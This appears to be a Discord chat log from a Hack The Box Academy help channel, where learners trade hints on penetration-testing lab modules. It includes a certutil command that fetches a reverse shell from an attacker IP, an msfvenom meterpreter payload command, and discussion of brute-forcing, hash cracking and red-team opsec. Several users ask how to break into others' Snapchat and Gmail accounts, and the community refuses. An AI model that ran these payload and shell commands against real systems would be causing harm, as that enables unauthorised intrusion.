#modules
If I buy the student subscription for HTB Academy, does that mean I don't have to pay cubes up to tier 2 modules?
As long as you're subbed, yes
And if you complete the module iirc you have permanent access
Will the 8 dollars be deducted automatically every month or do I have to renew it manually?
Automatic as long as the payment source is valid
What if I want the sub just for a month? I have a lot of free time rn
You can always cancel right after you subscribe, and it'll remain for the month.
alright cool thanks
HTB Academy -> Module: File Inclusion -> Section: PHP filter
Fuzz the web application for other php scripts, and then read one of the configuration files and submit the database password as the answer
I tried Source Code Disclosure (convert-base64), curl, nothing happens. Any guidance?
hey @fathom pendant can I DM you pls?
For?
Some advice, if you are ok with that
Sorry I'm about to sleep soon so brain is off
Sure
@high sentinel it's ok if I DM .. MarcieLee is going to bed
and need some quick advice
sorry to ping like that
why don't you just ask here? 😄
why? 😄
so you are looking for an advice, that's it? 😄
well i could probably answer it, but unfortunately i'm about to leave as well 😄
possibly
ok thx
Hey guys, I'm trying to do the medium lab for IDS/IPS evasion. I am currently trying to run a UDP scan tracing the packets with 20 decoys and using the source port as DNS. I am using the -sV mode to try to grab the version but have been unable to
How can I hack into my old snap account
Don't need decoys, don't need sV, think back to the section about the different type of scans
hint: ||instead of using -sV you can try capturing with tcpdump. If it does not work on your VM try on PWNBOX cause it has happened to some folks ||
I'm attempting to use --script dns-nsid
Nah using a specific scan type you can get the port every time
after removing both -sV and decoys
what the flyin
Nah
People keep saying udp is needed on that, but it's not
The port is TCP/UDP but it's a specific scan option that will get you it
how is the nudge without using udp out of curiosity?
-sS or -sT isn't working for me either
One of those should work on their own
There's a scan that you can copy directly from the IDS/IPS section
Just need to change ip
And remove the port iirc
Yea no luck
Try running in pwnbox BC I legit sanity checked this the other day
Can I dm u my cmd?
Hey anyone know how to get into a snap account
anyone that can help me with AD module assessment 2?
making progress, but stumped on something
just got the flag on SQL01, but not really sure where to go from here

DM me
GOT IT
No. If you can't log in, contact snapchat.
Ok thx
Is cracking the IPMI password supposed to take a long time? I made it to about 20% in 18 hours and my vm crashed 😭
@steady python no
Any tips? @placid quest I dumped the hash with metasploit and then ran the hashcat command to crack it
@steady python use john
try rockyou first
Thanks. That was insanely fast.
Usually, if you're meant to bruteforce something, it will be in rockyou.txt.
I concur, but the way the module is written, it led me to think I was getting the hash of a randomly generated 8 character password
U got this question ?
Why do I get this error? curl -X PUT http://ip:port/api.php/city/london -d '{"city_name":"flag","country_name":"(UK)"}' -H 'Content-Type: application/json'
Unknown column '' in 'field list'
in the Documentation & Reporting Practice Lab
Can anyone please give me a hint for the first question? "Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the Administrator Desktop on the DC01 host". I have from the previous pentester the hash of an admin but this is not an NTLM hash, so I'm not sure how to proceed here
What error?
Unknown column '' in 'field list'
DM me
Change country_name as per question
i tried that too
Dm me
ok
Active Directory Enumeration and Attacks Skill Assessment I
I have some questions about it:
- Can we compromise the DC without tunneling?
- At the last step, I can use crackmapexec to perform command execution but cannot get an interactive shell. Can someone nudge me how to do it?
I'm just taking a break from that one for a bit. Do some other mods and come back to it someday. Thanks for checking
OK np, you're welcome
You can use something like certutil -urlcache -split -f "http://attackingIP/windows reverseshell" /path/on/target to remotely download files to the target with your RCE
Did you do it in this way too?
I keep getting port 22 connection refused in Linux fundamentals
Good morning. I am working on imap enumeration. I have answered all questions but the last two:
What is the admin email?
Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})
I have connected to the smtp server via openssl and can log in with Robin's credentials. While on the server it shows there are 0 messages. I am assuming in the email I will get the admin email and the flag? Any assistance will be appreciated
how many inboxes does the user have
This is just how I get interactive shells on windows systems if I have RCE yeah
let's avoid the spoilers a bit
you have the list of the inboxes, have you tried to go through them?
Yeah, right when I was typing that I found the message, trying to figure out how to list and fetch it
Anyone around that I can bounce some ideas off of for initial access to the "Password Attacks Lab - Hard" module?
Hi guys need some help on Windows Privilege Escalation Skills Assessment I, having some trouble on getting the exploit onto the box.
Certutil doesn't seem to work, returns an internal error.
Wget also doesn't work
sure shoot me a dm
For that I use wget but output the file to temp
Nevermind, found it literally right after I asked.
nice
Hello guys, I'm stuck at decoding this flag using burp suite decoder at the encoding/decoding module: VTJ4U1VrNUZjRlZXVkVKTFZrWkdOVk5zVW10aFZYQlZWRmh3UzFaR2NITlRiRkphWld0d1ZWUllaRXRXUm10M1UyeFNUbVZGY0ZWWGJYaExWa1V3ZVZOc1VsZGlWWEJWVjIxNFMxWkZNVFJUYkZKaFlrVndWVmR0YUV0V1JUQjNVMnhTYTJGM1BUMD0= . Could anyone help me please?
Please also tell me how you decoded it
@autumn pilot can I dm you
I used cyberchef 😅
I have the mailbox, I can't get the fetch command down
what's that
here you can give this a try https://donsutherland.org/crib/imap
Google it
@vital adder I am using that
It is not liking my flag commands
I know the message is in seen
I got 0 idea about what you mean in your first question, but for the second one, if you are using cme with the hash and can get RCE you can just use evil-winrm for a shell
ahhhh i see ^^ thanks
But how would I go about it without Burp Suite? There's nothing in the module about such tools
- find what kind of encoding it is
- decode it
Ok, think I'll do it this way
I found the flag using internet websites
Or psexec.. or wmiexec... or any of the impacket exec scripts... or rdp (cuz usually domain admins can rdp to the DC)
oh no F psexec, that F ing tool wasn't working for me in Offshore for no reason and I was stuck for 2 days thinking I was doing something wrong
After I found out I can just basically do the same thing with wmiexec everything worked just fine, that tool saved my ass
Yea. Psexec is weird
wmiexec is also way better if you care about opsec
(Yes I know it's still pretty bad but it's better than psexec)
If you're positive you have valid creds, it's always worth running down the gamut of options just in case.
Yep
There's always gonna be that one box that just flat doesn't work with your preferred method.
I got a F ing ticket in my case 🤣
I include tickets as valid creds lol
Well I mean, a ticket pretty much is a password lol
Sometimes it's better than one
Other times you wish you could shove the ticket down the DC's throat
I have a question on the "Footprinting / IMAP/POP3" module:
I logged into the IMAP server with the "robin/robin" credentials, selected the inbox and now I'm trying to read the messages. I tried these commands:
||1 fetch 1 all||
||1 fetch 1:4 (BODY[HEADER.FIELDS (Subject)])||
... and similar ones.
They all return the same message:
BAD Error in IMAP command FETCH: Invalid messageset (0.001 + 0.000 secs).
A google search says that this is a bug in dovecot versions 0.99.13 and earlier (see https://bugzilla.redhat.com/show_bug.cgi?id=429100 and http://blog.tcg.com/blog/dovecot_invalid/).
So, my question is:
Am I using the correct command to read the inbox emails? Has anyone had the same problem?
Thanks!
Hey, I could use some help. I'm working on the Password Attacks module. I'm on the Attacking SAM part. I have saved the SAM file but when I go to move it to the file share, it says permission denied, and I have literally given full control to every user in regards to that file just to be sure lol
Just fetch 1 without additional queries iirc
I'm on the ffuf module
doesn't ffuf, it just instantly says 39/39 with no output
probably a vpn issue
but the question is telling me to scan /blog
something has to be there
i see those errors ...hmm
I don't know why but it's def a vpn issue
was working fine minutes ago
here's the vpn output
In the active subdomain enumeration exercises, I'm having issues with the second exercise. I've done a zone transfer and the number of zones I submitted from that is incorrect, and I also tried with dnsenum and the number of found subdomains is again incorrect. I'm not sure what's going on and would appreciate some help
Yeah, I had a vpn issue on the NFS assessment... couldn't look at the NFS share... reset and then I could see it... was questioning myself for 30 min
That is expected output. Try reconnecting to the vpn
question 2?
yes "Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. "
Never mind... thought you were doing the DNS assessment
ahh
restarted the target and it worked
You should be able to get it with axfr
hey - how long should it normally take for your own machine to connect to the vpn when running the openvpn command?
probably a minute, max.
hmm okay, doesn't seem to work, i'm going to troubleshoot it thanks!
Do you get an error message?
I mentioned that I did that already
Zone transfers and dnsenum tool
also tested for zone transfers of the subdomains and some worked
However, none of the numbers I'm finding are correct
takes me about 2s
it's stuck on
2023-01-13 16:49:42 net_route_v6_add: dead:beef::/64 via :: dev tun0 table 0 metric -1
the funny thing is that I have finished all the other questions, I just cannot finish the second one
got it to work 👍
What was the issue and what was the fix?
zone != subdomain
What is the difference exactly? I found this post but don't fully understand it.
I already did. Also tried psexec and wmiexec with no success. For the first question, I used tunneling to interact with the internal domain, but I would like to know if someone can compromise the DC without using tunneling or port forwarding.
shoot me a dm
This also helped me a lot:
https://www.atmail.com/blog/imap-101-manual-imap-sessions/
sup, anyone looking for help? 😄
if you have a minute: #modules message
Afaik a zone can be a top level domain (i.e. company.com) while a subdomain is a "subzone", if that makes sense
honestly not sure, restarted my VM and it worked after that lol
Possibly try looking up what a zone transfer is, that might get you a bit of a better understanding of that
Asking things like this is against the server rules. I'd advise you delete that message if you want to remain in this server
but what happens if I cannot do a zone transfer. How do I know if it's a zone or a subdomain?
isn't the difference obvious? example.company.com vs company.com, at least that's my take on that
the zone company.com can contain records like server1.company.com, server2.company.com and the subdomain (in DNS terms it's a zone as well) can contain stuff like otherserver1.example.company.com, otherserver2.example.company.com
Subdomains are x.company.com
Then they can have their own subdomains, but that question is specifically asking for the main domain how many
I have a question, if I take the Silver Annual Billing, it says I get Direct access to the entire Penetration Tester job role path
But OSINT: Corporate Recon says I still need to pay the cubes?
The Silver Annual Subscription includes modules up to Tier II. Tier III and IV modules are not included and must be purchased with cubes.
What you get
- Direct access to all modules up to (including) Tier II
- Direct access to the entire Bug Bounty Hunter job role path
- Direct access to the entire Penetration Tester job role path
- Unlimited Pwnbox usage
- CPE credits submission
Direct access to the entire Penetration Tester job role path
Afaik OSINT: Corporate Recon isn't part of either job path
The OSINT module is not part of the CPTS.
but it is
check 13.
Ah I see now
Nevermind, it says "recommended"
but not actually in the path
The actual path has 28 modules, the recommended path has 33
yes
I see, I just figured if I follow the section it's the most viable way
Hi, I'm having a problem when executing a msfvenom payload:
Anyone know why that's happening? I generated the .elf with this command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.14.238 LPORT=443 -f elf > shell.elf
and waiting for a reverse connection in msfconsole:
That machine name looks familiar, which module are you on? Also I 100% remember the Web Delivery module, run 1 command on the target machine and you get a meterpreter shell
@vital adder ATTACKING ENTERPRISE NETWORKS
I'll try
same problem 😦
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.238 LPORT=443 -f elf > shell.elf
ok, options?
you're using a different payload
the payload in your options is generic/shell_reverse_tcp and you are using a linux payload
I'm using the default and it's maybe a non-staged
you cant combine different payloads
go back to x86 and use the same for both msfvenom and msfconsole
xD
I'm trying to get a flag but it keeps giving me errors in my curl command, would I be allowed to send my command and error so someone can tell me what is wrong/what I need to change
its a syntax error
sure
curl -X PUT http://161.35.162.53:30564/api.php/city/Detriot -d ‘{“city_name”:“flag”, "country_name":"HTB"}’ -H ‘Content-Type: application/json’
Unknown column '' in 'field list'
curl: (3) unmatched close brace/bracket in URL position 17:
country_name:HTB}’
everything after json is an error
are you sure you're using correct apostrophes?
I've tried ' ' and
should be used like this -d 'something'
is there any fast website for decrypting the IPMI hash?
hashcat is taking foreverrrrrrr
i mean like -d '{ "something" : "here"}'
curl -X PUT http://161.35.162.53:30564/api.php/city/Detriot -d '{“city_name”:“flag”, "country_name":"HTB"}' -H 'Content-Type: application/json'
so like that^?
"Unknown column '' in 'field list'"
bruh io hate syntax errors like bruhhhh
like when you know the command is right, but the syntax is like "no'
is linux well suited as your daily driver for full-stack development?
Hello, I need help with zap, I can't use the zap interface
is there any way to get around using hashcat to decrypt the IPMI hash?
I think John can decrypt
yooo
have an issue with trying to get the root flag in privilege escalation
when I tried to ssh into root with my id_rsa I'm asked for a password
did you use -i?
yeee
did you chmod the id_rsa first?
^ and did you chmod the permission
on the ffuf module
yeee 600
And you did root@ip yeah?
yeeee
I think if you use -e you can specify extensions separated by comma or space, not sure
i tried both
password:
I searched on the GitHub, there was some stuff abt a file
dirsearch
I didn't understand it though
what question are you on?
wasnt meant to put a space
get root flag
privilege escalation starting point
like on regular htb?
sounds like maybe you didn't copy the key fully.
do you know if you can do multiple urls?
Not with just ffuf. But you could script it with bash or python.
yeeee
I left that part out
with private key starts here
that'll do it
Do you have the ---Start RSA and ---End RSA? In your key?
now I do
but I didnt have
are gifs blocked here?
You need to verify your HTB account in #bot-commands
Yo, I'm working on the File Upload module and I've got a question: I have to find an extension that is not blacklisted and can execute PHP code on the web server, to read /flag.txt. So I fuzzed extensions with a php-echo payload and found some extensions which should do the job. Upload worked, but when I try to communicate with the webshell, I get a blank page. Viewing the source I see the uploaded web shell red underlined with a text: Saw “<?”. Probable cause: Attempt to use an XML processing instruction in HTML. (XML processing instructions are not supported in HTML.) . Any ideas on that? Thx in advance.
How can I like become a white hat hacker (HackerOne)? Something about the same as HackerOne, how can I learn that?
does it have something to do with the header? (xml)
Seems like a good question for #general
I do not have access to that
How do i
Verify your HTB account in #bot-commands
You do
For this Module and Question: Footprinting > Host Based Enum > DNS > What is the FQDN of the host where the last octet ends with "x.x.x.203"? Can someone tell me if I have the right wordlist that will answer this question?
The list is in there yes
Also subdomains of subdomains exist remember that
Thank you for the sanity check!
Right, I found a few others already: x.sub.inlanefreight.htb.
Nope
That was just an example. I can dm you specifics if you want.
But dnsenum tool is based
That is what I'm using.
@fathom pendant Thanks for the sanity check and the assistance! 🫂
Npnp
Hello
Asking for those things is against the rules of this server. Would highly advise you delete that message if you want to stay here
Hi tux
sup
I don't want to be hacked, that is, I'm just from Russia and I want to know something)
Sorry
I just wanted to find out how they do it and so on, to get information. I want to apply to be a programmer, but I think that I can't handle the specialized mathematics, so I'm going into information protection ...
What can I learn about here? I have a very strong desire, but in Russia they don't teach this
If you want to learn how to hack an Instagram account you can kindly F off, but if you want to learn cyber security and don't know where to start, give both of these videos a check https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM
Introductory video on getting into hacking and cybersecurity.
Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com
Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...
Hi, I'm a bit stuck in the module "Getting Started" in "Knowledge Check". I'm in the admin panel, I know what I have to do (upload a file) but the button to actually upload doesn't seem to work. I have also tried with metasploit but same thing, "upload failed". I have tried to upload a file using wget just in case and it does not work either. Can you guys tell me if I'm missing something? Thanks a lot
I like to suck my uncle's ass
hint that's a ||rabbit hole|| and you'll need to find a different method to exploit this
me too
😉
Thanks ! 😄
i got a 3rd leg rn
magic
Hi guys, I'm stuck at the Web Assessment for Proxies. /lucky.php: I should enable the disabled button. Once I un-disabled the button using Burp Suite or ZAP it sends the request with the getflag=true param. But I don't get the flag. Is this normal? How do I get the flag?
I am a skid
can sm1 teach me
that's a luck thing (hence the name) and you have to click it a bunch of times
I did make a bash script for this and I think like out of 100 clicks I got like 10-20 flags back
k thanks!
I could use Repeater in Burp Suite, right?
Has anyone thought of making a more advanced job-role path that picks up where an already existing one left off?
I would love an advanced web app hacking path or an advanced penetration testing path
Etc
Just a thought
Most likely yes, I think I did have some issue with that at first but I think it was a bug on my side, so I think you should be able to
👍
Academy has some advanced modules that aren’t included in job role paths is why I am asking
Nibbles starting point thing should walk you through it
Hi all, is anyone on the fingerprinting module? Am I the only one for whom the footprinting lab machine is constantly dying?
Which footprinting are you having issues with
Hey, I could use some help. I'm working on the Password Attacks module. I'm on the Attacking SAM part. I have saved the SAM file but when I go to move it to the file share, it says permission denied, and I have literally given full control to every user in regards to that file just to be sure
I have no credentials (assumed and tried the ones from the past levels), can't enumerate any strings on snmp so bruteforcing seemed like an option
thing is, every time I boot hydra for ssh for example (even with the -t 4 option)
the machine freezes -.-'
need to respawn
https://tenor.com/view/sonic-the-hedgehog-knuckles-knuckles-the-echidna-dancing-dance-gif-17792854
maybe bruteforcing the login is not the way but still quite frustrating
Which part of footprinting are you on, the lab? Easy, med, hard? Hydra isn't needed
There's a tool to find the community string for a given domain have you tried using that?
hard
ok thanks! So bruteforcing the community name seems to be the way then.. one question: for each level, is the provided wordlist enough or shall we use different ones (e.g., SecLists)?
Seclist, the footprint word list is just usernames
Seclist is nice enough to give us their lists split up in different folders
But first you need to find the comm string using one of the tools shown in the module
Thanks for the tip.. I've tried before with all the lists from /usr/share/seclists/Discovery/SNMP/ with onesixtyone but as I had no hit (and I thought the "thematic" seclist would be the one to use) I moved to a separate service (like ssh in this case)
will try other seclists like rockyou or so
¯\_(ツ)_/¯
so it tells me why this is but could someone explain better?
wth @wide path imagine having the same username
😄
Hey guys, I'm doing the module Intro to Network Traffic Analysis and I think I spotted an error but I'm not sure, that's why I prefer to ask here. In the section Tcpdump Packet Filtering there is this sentence:
AND as a modifier will show us anything that meets both requirements set. For example, host 10.12.1.122 and tcp port 80 will look for anything from the source host and contain port 80 TCP or UDP traffic
Shouldn't it be... "the source host and contain port 80 tcp traffic" instead of "80 TCP or UDP traffic"? In the command there is "tcp port 80" so it filters only tcp port 80, not UDP, right?
what is it that you don't get?
Why can't I just vim the file and replace the current code* and add a shell
what is the command?
host 10.12.1.122 and tcp port 80
that matches exact host and tcp port 80
yes but the sentence says : port 80 TCP or UDP traffic
i'd say that's incorrect then
thanks
just my opinion, you could try testing that yourself locally
with something like nc or so
i think i'd need more context for that, looks like it has to do something with the monitor.sh file
I don't need help with anything related to the actual box just the module text I posted
yeah i get that
What I mean is basically why can't I just edit the file monitor.sh and replace all its previous code with the one liner rshell
you possibly can if you have the perms for that, the idea might be that you're gonna break the functionality or possibly spoil the box for other ppl (if that was part of the box)
not sure exactly on that, try asking someone else 🤷‍♂️
yeah probably functionality
The point is showing you how to append to a file; the copy part is so that you don't have to reset the box if you bork it hard
@fathom pendant just wondering how come you seem to be helping here so much? Is that like your job or so? 😄 👀
well, I did fork it hard, in fact I accidentally added two shells, one with wrong info and I think I forked myself over
Idk if there's any way to fix that
I should have made a copy
😄
exactly like the module told you so? 😄
better listen to it next time then 😄
yep!
oh it lets me use vim, maybe I'll get lucky and the vim gods will let me do what I want to do
nah I'm screwed rip
Just like helping people
Try extracting data from the db.
Hi guys any help on Windows Privilege Escalation Skills Assessment - Part II?
Already ran Windows Exploit Suggester, tried a few but nothing seems to work.
Okay
I got john to crack the IPMI hash I had an issue with earlier. However, now when I use the --show command it says duplicate option and does not work
Marcie you are so clutch, if this was Twitch I'd cheers ya
TFW I forget about the trailing . In lookup queries lol
Hey, Thanks for your responses on Moondark's questions, very helpful. My list is 187k long. I've cut the first 17k lines as suggested. My target is active for 80 minutes and I can usually get through ~3500 attempts in that time. I've split the mutated passwords list into 48 splits and am slowly working through them one at a time.
Someone else suggested avoiding brute forcing ssh and instead targeting a faster service like smb. My question is: is there a way to reduce the wordlist to a reasonable size to crack in one session, or is the module designed to make me process a potential 30+ hours of brute forcing to find the credentials?
$2y$10$vdrhbczi1dzgzatpdcdg.o6bnalj1cd5hbqhmgjhjw982aijugwby
what kind of hash is this?
I always look here: https://hashcat.net/wiki/doku.php?id=example_hashes , but I do not see one like that listed
thx
Happy happy friday nerds
Have you considered bcrypt / Blowfish
Ftp is much faster than ssh. Never try to brute force ssh unless you've literally tried everything else
I'm working through the "Attacking Common Applications" module and we're shown when attacking CMSs to first set up a web-shell and then execute a bash one-liner in order to get a reverse shell. Is there a reason for this two step process? Why not just paste a PHP reverse shell, instead of first a web-shell and then getting a reverse shell?
The idea is to ensure your reverse shell actually gets executed. Imagine you try to fire off a reverse shell and get no call back. Then you spend 20 minutes trying to figure out why it doesn't work, only to realize the site isn't actually executing php like you thought it was. All of that would have been avoided had you run some php code that would display something back to you
You don't have to use a webshell first but it's generally a good idea to confirm what you think is happening is actually happening
I see, that makes sense. Thank you.
On top of that, when you care about not getting caught, getting a full reverse shell is very very dangerous and should only be done after you've thoroughly enumerated your target through a webshell and determined the active defenses
anyone done the common applications skill assess 1?
Not too much opsec discussion on HTB cause it's unneeded on a sanctioned pentest, but more likely an adversary would be running these tools from some kind of C2 framework or even custom-made tools through multiple proxies, and may have a machine spun up on a cloud service, so if there is a computer forensics investigation they will see the IP and data of your cloud computer, and they may even be connected to that through another proxy or 2 of various kinds.
Yes. And I know opsec isn't completely relevant on HTB but my career end goal is red teaming so for me opsec is very relevant
You don't need opsec on a sanctioned red team activity cause your op is already known and fully disclosed lol.
You are aware that opsec involves more than just hiding your identity?
The whole point of a red team engagement is to emulate a real threat actor
not much opsec as most of the time you're disclosing vulnerabilities and how you found them,
Yea but you don't disclose them till after???? Bro the point of a red team engagement is to see what would happen if a real threat actor decided to attack your business. That involves staying hidden for as long as possible, which is almost 100% opsec
operational security is keeping the knowledge and methods of an operation or activity hidden. By definition there is no opsec on a sanctioned redteam activity because your "operation" is 100% known and expected.
You're completely misinterpreting that. You need to keep your activity hidden while the engagement is being carried out. Yes, you will disclose everything after but that does not mean you can just get a shell on a machine and run whoami on a red team engagement
That will get you caught instantly
ok well guess you're right, there is opsec employed during the engagement
with the intent of practically destroying all or almost all of your opsec at the end of the engagement
Yes. Opsec does not exclusively cover the methods used to achieve whatever the goal of the engagement was.
The methods will always be revealed. Otherwise there would be no point. But the second half of opsec is not getting caught. And that's a very big part of red teaming
(Also we're very off topic so probably best not to continue this conversation in this channel)
Can someone help me on the Attacking Common Services hard lab? I'm on the last step and I'm trying to figure out what I should do....
i can help
dm me
Thanks
Any tips on how to get a hostname in the nmap enumeration academy module?
I tried everything I could think of with nmap, then I tried nc and telnet to each open port, then I tried browsing to the apache server. Couldn't figure out how to connect to back orifice. Arp and ping with name lookup options on didn't help. Tried smbclient because it looks like SAMBA is running on the host. I'm all outta ideas.
nvm I figured it out. I caught the hostname in output a couple of times but mistook it for nmap artifacting
Hello, I need help, if there is anyone who has used DefenderCheck for AV bypass. I tried to compile it using Visual Studio but it refused. Any help...
How about you read the server rules instead?

does anyone have any ideas about this today?
Please read #rules and go to #welcome
Use ++verify in #bot-commands and follow the instructions from the bot in your DMs
Live Engagement: What is the hostname of Host-1? (Format: all lower case)
Module: Shells&payload
Section: Live Engagement: What is the hostname of Host-1? (Format: all lower case)
question: how can I access the web browser? Or should I use another tool to get the hostname?
Why doesn't the Attacking AD module talk about the ASREP-roast attack?
Module: Attacking Common Services - Easy
What wordlist do I use to brute force the ftp server with || fiona@inlanefreight.htb || , I have tried the provided one, rockyou.txt went up to 20000 which I felt was a bit much and many others. Been stuck here for quite some time now so any help would be appreciated!
Maybe the username is not correct.
With rockyou you should get success quickly
How do I go about this question from Web Proxies Assessment? Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload). I'm using Burp suite for fuzzing. For the Payload settings I'm using the alphanum-case.txt. For Payload processing it's following:
- Add Prefix: 3dac93b8cd250aa8c1a36fffc79a17a
- Base64-encode
- Encode as ASCII hex
At the attack results I noticed every Length was the same and no payload was right. What should I do now?
still need help with that?
yes
i think you're having a couple of issues there
i have entered every possibility manually but still no luck xd
why are you using base64 encoding?
"while encoding each request with the encoding methods you identified above"
hmm, ok then
isn't it reversed then? steps 2 and 3?
like if you can provide the exact payloads it would probably be much more clear, i haven't done that myself, i can't tell without seeing it really
no otherwise the hint wouldn't be correct (has to be 88 chars)
this is the md5 where 1 char at the end is missing: 3dac93b8cd250aa8c1a36fffc79a17a
and the original cookie looks like? what is some example payload that you're sending?
"The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer." this is the md5 cookie
example payload: 4d325268597a6b7a596a686a5a4449314d4746684f474d7859544d325a6d5a6d597a6335595445335957453d
its the hex encoded from the base64 encoded md5 string "3dac93b8cd250aa8c1a36fffc79a17aa"
yeah, that looks fine to me
yeah, i think the issue is step 1 then -> append, shouldn't it be prepending instead?
"So, try to fuzz the last character of the decoded md5 cookie"
solved? 🙂
it isn't the issue, just tried it out but still doesn't work :/
hmm, that's not making sense to me
so, let's say that the character is A, how does your generated payload look?
what wordlist i have to use to crack the pw hash from NOSQLI assessment 2 ?
NVM ....
yesss!!! finally, im so dumb. I should've read the question more carefully
ty
rockyou?
tried for about 30 minutes
what hash type is it?
blowfish bcrypt
Doesn’t work. I get the exact same error as before.
that's generally not easily crackable so you might need a specific dict for that (not sure what) or just try something simple like username, admin or so
alright im giving it a try
The majority of things designed to be cracked on HTB are from rockyou.txt
Mostly meant to teach how to crack something rather than expecting you to throw random wordlists at it
yo could anyone give me a nudge on the login bruteforcing skill assessment
the web login part
@pliant sage I am stuck on that i got 1234567 as the password but it is not working
@pliant sage The second login page i got the password but the password is not working
yeah you probably have the wrong fail string if your password is 123456
@pliant sage the string is correct
nvm figured it out
Hi all
i am stuck in the snmp section of the footprinting module, at the last question .... anyone have a clue? please let me know. i already tried the snmpwalk command as well, but i am not sure how that answer should look.
When you run the snmpwalk what do you see?
is there anyone who just started learning on the academy??
snmpwalk should give you the answer fairly easily. You will have to let it sit for a little while and you'll eventually see what you are looking for
if you are doing it from your own VM, try doing it from the browser based pwnbox
if the snmpwalk trail doesn't continue for a little while that is
@glad wave dm you. please check
@ivory hollow i was also stuck at the same problem, it's very simple. actually when you run onesixtyone you think that nothing is happening, but the output is giving you the community string of the target. after getting that community string you should use snmpwalk
re read the module very carefully even if you are unable to get the answer dm me
Hello
I hope you are all well 🙂
I'm having an issue on the Getting Started module, chapter Public Exploits
I configured my exploit in metasploit and when i use the cmd exploit the connection with the target drops
shoot me a dm
@cunning drum .... i solved it... thanks for your kind assistance.
I did it
Can anyone point me in the right direction? On the web proxy assessment, I have found the disabled button html... But how can I enable it with burp? Or Zap?.. i can't find anything on how to do this
You don't have to crack the hash, there is something else on the db.
a different user/pw or do you mean a third field like notes or something?
try to bruteforce the parameters (e.g. with a regex matching everything)
The lightbulb in Zap will do it - this is described in the "intercepting responses" section. You could also do it with Burp or Zap as described in the "Automatic Modification" section - just find the HTML that is disabling the button and change the HTML in the response so your browser will render your modified HTML with the button enabled
lightbulb was completely broken for me 2 days ago but yeah you can use burp to modify every incoming response w/ the word "disabled" in it
May be kinda finicky... Working for me rn, but I'm on local kali vm not pwnbox
can anyone give me a nudge for bruteforcing applications - service login skill assessment
Yeah I have a local kali too, was fighting for my life to get zap to function each time i tried to use it
c./username-anarchy Bill Gates > bill.txt
zsh: permission denied: ./username-anarchy why is it denied? tried it as root as well, still the same
is there a javascript function to get a parameter name ?
i want to use this.xxx.startsWith("") to investigate further, but the parameter name is unknown to me.
i tried to spray some parameter names just like this.flag...
.match(/.*/g)
I get this error when using whatweb: "ERROR Opening: http://app.inlanefreight.com - no address for app.inlanefreight.com" even though I set the given ip to inlanefreight.com in /etc/hosts
Did you also add the subdomain? (app.inlanefreight.com)?
okay i think you misunderstood me
i need to know the parameter name aka variable, not the value of it
before i can bruteforce its content with either .match() or .startsWith() i need to know the parameter name
like this.unknownparameter.match("/.*/g")
Can I pm?
sure
no, i dont know the ip of it I was just given 10.129.103.128 for inlanefreight.local
If this is just a vhost, it should be the same IP.
Hello
Need some help for a chapter on the GETTING start module
I can probably help.. What's the question?
im stuck and I do not know what i can do 😦
im a beginner ^^
What section of the module are you on?
public exploit
dm
Can anyone help me by bypassing a gmail password please i really need help
dm'd you
😄
I'm gonna go out on a limb and guess you don't own this account?
cmon, don't be that way 😄
Well I mean if he owned it then he could probably get into it by hitting "Forgot Password"
He’s not wrong but in a way i do
No. There's no complexity to this. Either you do or you don't
It's not mine but this dude gave me a stacked steam acc but left it on that gmail, and there's probably 5k worth of stuff on it
Can't help you.
"gave" 😄
I'd also highly advise you don't ask in this server again if you don't want to get banned
Alr
hey - im currently doing the zap scanner question in the 'using web proxies' module but i cant seem to figure it out. i managed to find the high level vuln but im not sure how to apply it
i'm not sure what kind of advice are you expecting on that 😄
how can smb be giving false positives?
whatcha mean
you literally said you have an issue with something unspecific 😄 what kind of advice are you expecting for that? "turn on your computer"?
are you having a bad day today?
sounds like anonymous authentication works then? have you tried looking at the traffic or using another tool?
i dont want a spoiler
cme working for any creds is not making much sense to me, the only reasonable explanation seems to be anon auth
otherwise just try looking at the traffic
hey - im currently doing the zap scanner question in the 'using web proxies' module but i cant seem to figure it out. i found the vuln path traversal on the comment page, how do i use this to find the directory containing the '/flag.txt'
what about smbclient -U 'random%asdf' -L //1.2.3.4?
afaik there are two types of smb authentication when it comes to smb without creds. I'm not sure about the correct naming, i think one of them is called anonymous and you don't need any username for that, for the other one you can just use any name/password iirc or maybe just any name without password (ie smbclient -U 'random' -N //..)
well, isn't it possible that you can get any data off the smb first to possibly get working creds for it to access another share or so?
i'm not sure you're getting what i said but i may be wrong about that, i haven't done any of the academy stuff. If you can do anon auth to smb, you can list shares and possibly access some of them. If there was like a share username which would require a specific password/username combination you would need to bruteforce that to access it. There could possibly be a wordlist accessible anonymously on another share or so.
any idea about the OS of the box?
try using -d domain, --local-auth or just using box_name\username with cme
if ssh doesn't support password based auth there's no point in trying to connect using username/password, there's likely gonna be a flag or ssh key on the smb
anyway if that doesn't help or if you were to solve this on your own, it's a good idea to dig deeper - ie looking at the traffic and figuring out what the issue is. That works every time 60 % of the time 😄
anonymous auth is indeed one of the big reasons behind false positive cme results.
worth checking with intentionally bogus creds for anon access
people forget about it cause they confuse it with guest and null share access, but it's its own thing
hmm? so the anon auth works? (should be working in this specific academy module?)
yeah, that's what i mean, null auth and guest access
there's a couple of modules/segments that have anon auth
which module and section is this again?
ah yeah, I have zero notes for some reason on that one
F
Hmm so you are getting false positives?
Give me an example of a false positive
Have you tried resetting the ip
Have you tried using msfconsole smb login scanner
hey, I read in the practice section of cpts that at the end of each module, there will be number of suggested retired machines, I tried to find them but I could not, can anyone help?
Try to slowdown the threads and speed that crackmapexec or msfconsole are scanning at
Hi, hello
What's the very first false positive you receive when running the scan
How about trying that with smbclient to enumshares 😄
Or crackmapexec
Any rust programmer around?
